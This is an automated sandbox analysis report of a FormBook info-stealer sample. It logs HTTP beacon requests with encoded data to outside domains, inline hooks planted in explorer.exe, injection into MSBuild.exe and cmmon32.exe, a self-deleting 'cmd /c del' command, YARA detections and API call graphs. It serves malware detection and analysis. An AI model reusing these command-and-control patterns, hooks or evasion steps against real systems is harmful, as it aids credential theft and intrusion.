                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.549711213.171.195.10580C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 16, 2023 23:50:01.373955965 CET39OUTGET /p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 HTTP/1.1
                                          Host: www.desipizza.uk
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Feb 16, 2023 23:50:01.407166004 CET39INHTTP/1.1 200 OK
                                          Server: nginx/1.20.1
                                          Date: Thu, 16 Feb 2023 22:50:01 GMT
                                          Content-Type: text/html
                                          Content-Length: 6486
                                          Last-Modified: Tue, 10 May 2022 13:33:35 GMT
                                          Connection: close
                                          ETag: "627a69af-1956"
                                          Accept-Ranges: bytes
                                          Feb 16, 2023 23:50:01.407186985 CET40INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title>
                                          Feb 16, 2023 23:50:01.407206059 CET42INData Raw: 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 20 63 61 72 64 2d 74 69 74 6c 65 2d 6c 67 22 3e 4c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 79 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: ass="card-title card-title-lg">Looking to buy a similar domain to</p> <p class="card-subtitle"><span class="domainVar"></span>?</p> <a class="btn btn-primary" onclick="searchSimilarDomains()" rel="nofollow">STAR
                                          Feb 16, 2023 23:50:01.407239914 CET43INData Raw: 45 6c 6c 69 70 73 65 5f 32 37 30 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 45 6c 6c 69 70 73 65 20 32 37 30 36 22 20 63 78 3d 22 35 35 22 20 63 79 3d 22 34 35 2e 35 22 20 72 78 3d 22 35 35 22 20 72 79 3d 22 34 35 2e 35 22 20 74 72 61 6e 73 66 6f
                                          Data Ascii: Ellipse_2706" data-name="Ellipse 2706" cx="55" cy="45.5" rx="55" ry="45.5" transform="translate(1085 526)" fill="#ffda84"/> <g id="Group_12722" data-name="Group 12722" transform="translate(1119.711 505.758)">
                                          Feb 16, 2023 23:50:01.407275915 CET44INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 50 61 74 68 5f 31 36 37 38 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 31 36 37 38 31 22 20 64 3d 22 4d 2d 33 34 34 2e
                                          Data Ascii: <path id="Path_16781" data-name="Path 16781" d="M-344.883,357.87a.085.085,0,0,1-.164,0,5.343,5.343,0,0,0-1.362-2.345,5.35,5.35,0,0,0-2.36-1.37.085.085,0,0,1,0-.164,5.459,5.459,0,0,0,2.382-1.415,5.458,5.458,0,0,0,1.3
                                          Feb 16, 2023 23:50:01.408441067 CET46INData Raw: 6c 65 22 3e 41 63 63 65 73 73 20 61 6c 6c 20 74 68 65 20 74 6f 6f 6c 73 20 79 6f 75 20 6e 65 65 64 20 66 6f 72 20 6f 6e 6c 69 6e 65 20 73 75 63 63 65 73 73 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: le">Access all the tools you need for online success.</p> <a class="btn hooverable btn-secondary btn-fix" href="https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking
                                          Feb 16, 2023 23:50:01.408461094 CET46INData Raw: 72 72 61 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 68 5f 70 61 72 6b 69 6e 67 5f 64 61 63 60 3b 0a 7d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: rral&utm_campaign=fh_parking_dac`;}</script></html>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3192.168.2.549713160.121.126.4480
                                          TimestampkBytes transferredDirectionData
                                          Feb 16, 2023 23:50:26.920788050 CET53OUTGET /p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 HTTP/1.1
                                          Host: www.couldskuathink.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Feb 16, 2023 23:50:27.130139112 CET54INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 16 Feb 2023 22:50:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1.0


                                          Code Manipulations

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE2
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE2
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE2
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE2

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:23:48:09
                                          Start date:16/02/2023
                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          Imagebase:0x650000
                                          File size:740864 bytes
                                          MD5 hash:19A7C2A3F614A2F0C25065ED749EFF53
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Target ID:1
                                          Start time:23:48:21
                                          Start date:16/02/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Imagebase:0x1e0000
                                          File size:261728 bytes
                                          MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:2
                                          Start time:23:48:21
                                          Start date:16/02/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Imagebase:0x310000
                                          File size:261728 bytes
                                          MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:3
                                          Start time:23:48:21
                                          Start date:16/02/2023
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Imagebase:0x550000
                                          File size:261728 bytes
                                          MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Target ID:4
                                          Start time:23:48:26
                                          Start date:16/02/2023
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff69bc80000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.582276153.000000000E3F1000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high

                                          Target ID:5
                                          Start time:23:48:40
                                          Start date:16/02/2023
                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                          Imagebase:0x1030000
                                          File size:36864 bytes
                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Target ID:6
                                          Start time:23:48:45
                                          Start date:16/02/2023
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language

                                          Target ID:7
                                          Start time:23:48:45
                                          Start date:16/02/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7fcd70000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:12.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:110
                                            Total number of Limit Nodes:7
                                            execution_graph 11228 28540d0 11229 28540e2 11228->11229 11230 28540ee 11229->11230 11234 28541e0 11229->11234 11239 2853c64 11230->11239 11232 285410d 11235 2854205 11234->11235 11243 28542d1 11235->11243 11247 28542e0 11235->11247 11240 2853c6f 11239->11240 11255 28551a4 11240->11255 11242 2856aa0 11242->11232 11244 2854307 11243->11244 11245 28543e4 11244->11245 11251 2853de4 11244->11251 11248 2854307 11247->11248 11249 28543e4 11248->11249 11250 2853de4 CreateActCtxA 11248->11250 11250->11249 11252 2855370 CreateActCtxA 11251->11252 11254 2855433 11252->11254 11256 28551af 11255->11256 11259 28557f8 11256->11259 11258 2856b45 11258->11242 11260 2855803 11259->11260 11263 2855828 11260->11263 11262 2856c22 11262->11258 11264 2855833 11263->11264 11267 2855858 11264->11267 11266 2856d22 11266->11262 11268 2855863 11267->11268 11270 28571e9 11268->11270 11276 2857488 11268->11276 11269 285747c 11269->11266 11271 285743e 11270->11271 11284 28591f9 11270->11284 11271->11269 11288 285b360 11271->11288 11293 285b350 11271->11293 11277 285742f 11276->11277 11280 285748b 11276->11280 11278 285743e 11277->11278 11283 28591f9 LoadLibraryExW 11277->11283 11279 285747c 11278->11279 11281 285b350 2 API calls 11278->11281 11282 285b360 2 API calls 11278->11282 11279->11270 11280->11270 11281->11279 11282->11279 11283->11278 11298 2859230 11284->11298 11301 285921f 11284->11301 11285 285920e 11285->11271 11289 285b381 11288->11289 11290 285b3a5 11289->11290 11318 285b609 11289->11318 11322 285b618 11289->11322 11290->11269 11294 285b381 11293->11294 11295 285b3a5 11294->11295 11296 285b609 2 API calls 11294->11296 11297 285b618 2 API calls 11294->11297 11295->11269 11296->11295 11297->11295 11306 2859328 11298->11306 11299 285923f 11299->11285 11302 285922a 11301->11302 11303 28591b6 11301->11303 11305 2859328 LoadLibraryExW 11302->11305 11303->11285 11304 285923f 11304->11285 11305->11304 11307 285933b 11306->11307 11308 285934b 11307->11308 11310 28599b8 11307->11310 11308->11299 11312 28599cc 11310->11312 11311 28599f1 11311->11308 11312->11311 11314 2859518 11312->11314 11315 2859b98 LoadLibraryExW 11314->11315 11317 2859c11 11315->11317 11317->11311 11319 285b625 11318->11319 11321 285b65f 11319->11321 11326 2859818 11319->11326 11321->11290 11323 285b625 11322->11323 11324 2859818 2 API calls 11323->11324 11325 285b65f 11323->11325 11324->11325 11325->11290 11327 2859823 11326->11327 11329 285c358 11327->11329 11330 28598e0 11327->11330 11329->11329 11331 28598eb 11330->11331 11332 2855858 2 API calls 11331->11332 11333 285c3c7 11331->11333 11332->11333 11337 285e138 11333->11337 11346 285e148 11333->11346 11334 285c400 11334->11329 11339 285e179 11337->11339 11341 285e26a 11337->11341 11338 285e185 11338->11334 11339->11338 11344 285e5b8 LoadLibraryExW 11339->11344 11345 285e5c8 LoadLibraryExW 11339->11345 11340 285e1c5 11342 285ef80 CreateWindowExW 11340->11342 11343 285ef90 CreateWindowExW 11340->11343 11341->11334 11342->11341 11343->11341 11344->11340 11345->11340 11348 285e179 11346->11348 11349 285e26a 11346->11349 11347 285e185 11347->11334 11348->11347 11353 285e5b8 LoadLibraryExW 11348->11353 11354 285e5c8 LoadLibraryExW 11348->11354 11349->11334 11350 285e1c5 11351 285ef80 CreateWindowExW 11350->11351 11352 285ef90 CreateWindowExW 11350->11352 11351->11349 11352->11349 11353->11350 11354->11350 11355 2859910 11356 2859952 11355->11356 11357 2859958 GetModuleHandleW 11355->11357 11356->11357 11358 2859985 11357->11358 11359 285b730 11360 285b796 11359->11360 11363 285b8f0 11360->11363 11366 28598a0 11363->11366 11367 285b958 DuplicateHandle 11366->11367 11368 285b845 11367->11368

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 285de6c-285fdfe 2 285fe00-285fe06 0->2 3 285fe09-285fe10 0->3 2->3 4 285fe12-285fe18 3->4 5 285fe1b-285feba CreateWindowExW 3->5 4->5 7 285fec3-285fefb 5->7 8 285febc-285fec2 5->8 12 285fefd-285ff00 7->12 13 285ff08 7->13 8->7 12->13
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0285FEAA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c10a833935f71e8ed562b10b03893323317fe30354842a784b1a929d3f6b43ab
                                            • Instruction ID: a60e2c28088901b453f6007b73b11a069a80e37c6d85f232d1e1b7568be1b124
                                            • Opcode Fuzzy Hash: c10a833935f71e8ed562b10b03893323317fe30354842a784b1a929d3f6b43ab
                                            • Instruction Fuzzy Hash: BF51D1B5D00318DFDB14CF9AC884ADEBBB5BF48314F24852AE919AB250D774A845CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 14 2855364-2855431 CreateActCtxA 16 2855433-2855439 14->16 17 285543a-2855494 14->17 16->17 24 2855496-2855499 17->24 25 28554a3-28554a7 17->25 24->25 26 28554a9-28554b5 25->26 27 28554b8 25->27 26->27 29 28554b9 27->29 29->29
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02855421
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 3c469e7cf8b08d063b3ebfd552661cdadb5c9370a84592468fe76a636d59fffc
                                            • Instruction ID: bf98e3b12f8bf5b6397e632423da2a7983f00b5af6f2a2fd5765947efe78c6ee
                                            • Opcode Fuzzy Hash: 3c469e7cf8b08d063b3ebfd552661cdadb5c9370a84592468fe76a636d59fffc
                                            • Instruction Fuzzy Hash: 9141E2B5C00628CFDB24DFA9C8847DEBBB1BF49314F608069D409BB251D779694ACF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 30 2853de4-2855431 CreateActCtxA 33 2855433-2855439 30->33 34 285543a-2855494 30->34 33->34 41 2855496-2855499 34->41 42 28554a3-28554a7 34->42 41->42 43 28554a9-28554b5 42->43 44 28554b8 42->44 43->44 46 28554b9 44->46 46->46
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02855421
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 0eacaa69df40a9b74e889841ff49f2eafc8498517c84453b65ac03c913e7412e
                                            • Instruction ID: 0749a5fd8a09094806397c52ad5218f21eb770ad6c14ef44ff4efbc9db3ee43e
                                            • Opcode Fuzzy Hash: 0eacaa69df40a9b74e889841ff49f2eafc8498517c84453b65ac03c913e7412e
                                            • Instruction Fuzzy Hash: 0441B2B5C0062CCFDB24DFAAC88479EBBB5BF48314F608169D409BB251D7B56949CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 47 28598a0-285b9ec DuplicateHandle 49 285b9f5-285ba12 47->49 50 285b9ee-285b9f4 47->50 50->49
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0285B91E,?,?,?,?,?), ref: 0285B9DF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c98a309448b8b481dabb098fb20c9f627ac785be04114dfbea00bdef02ab1d10
                                            • Instruction ID: e1efe524837ca1dfb5e7c11318b280146111eb10477b63a95ee0f62c72830a50
                                            • Opcode Fuzzy Hash: c98a309448b8b481dabb098fb20c9f627ac785be04114dfbea00bdef02ab1d10
                                            • Instruction Fuzzy Hash: BA2134B59002089FDB10CF9AD884AEEBBF8FB48324F10802AE914B7310D374A944CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 53 2859518-2859bd8 55 2859be0-2859c0f LoadLibraryExW 53->55 56 2859bda-2859bdd 53->56 57 2859c11-2859c17 55->57 58 2859c18-2859c35 55->58 56->55 57->58
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028599F1,00000800,00000000,00000000), ref: 02859C02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 70e25d3c8ec28682125316a723fc2d34d63706d0d185140d7dbea750c0c613ef
                                            • Instruction ID: 6f6073b3d1b0a6b02914c145174713c5fe26a4a7bd6d85d35491ec83759e0941
                                            • Opcode Fuzzy Hash: 70e25d3c8ec28682125316a723fc2d34d63706d0d185140d7dbea750c0c613ef
                                            • Instruction Fuzzy Hash: B81106BA900219DFDB10CF9AC444ADEBBF4AB48314F10846AE819A7600C374A945CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 61 2859b94-2859bd8 62 2859be0-2859c0f LoadLibraryExW 61->62 63 2859bda-2859bdd 61->63 64 2859c11-2859c17 62->64 65 2859c18-2859c35 62->65 63->62 64->65
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028599F1,00000800,00000000,00000000), ref: 02859C02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 9a5d2ea1bf1aa2cbefe2aeb36a7d967e00b53daded7d1ac61873476a9e5b2dd8
                                            • Instruction ID: b685aa081a342ee31ab2d9e7aa1c584341956f353979d3edf1249a6e38fe494c
                                            • Opcode Fuzzy Hash: 9a5d2ea1bf1aa2cbefe2aeb36a7d967e00b53daded7d1ac61873476a9e5b2dd8
                                            • Instruction Fuzzy Hash: C11114B6900249CFDB10CF9AD484BDEFBF4AB88360F14842AD819A7600C378A545CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 68 2859910-2859950 69 2859952-2859955 68->69 70 2859958-2859983 GetModuleHandleW 68->70 69->70 71 2859985-285998b 70->71 72 285998c-28599a0 70->72 71->72
                                            APIs
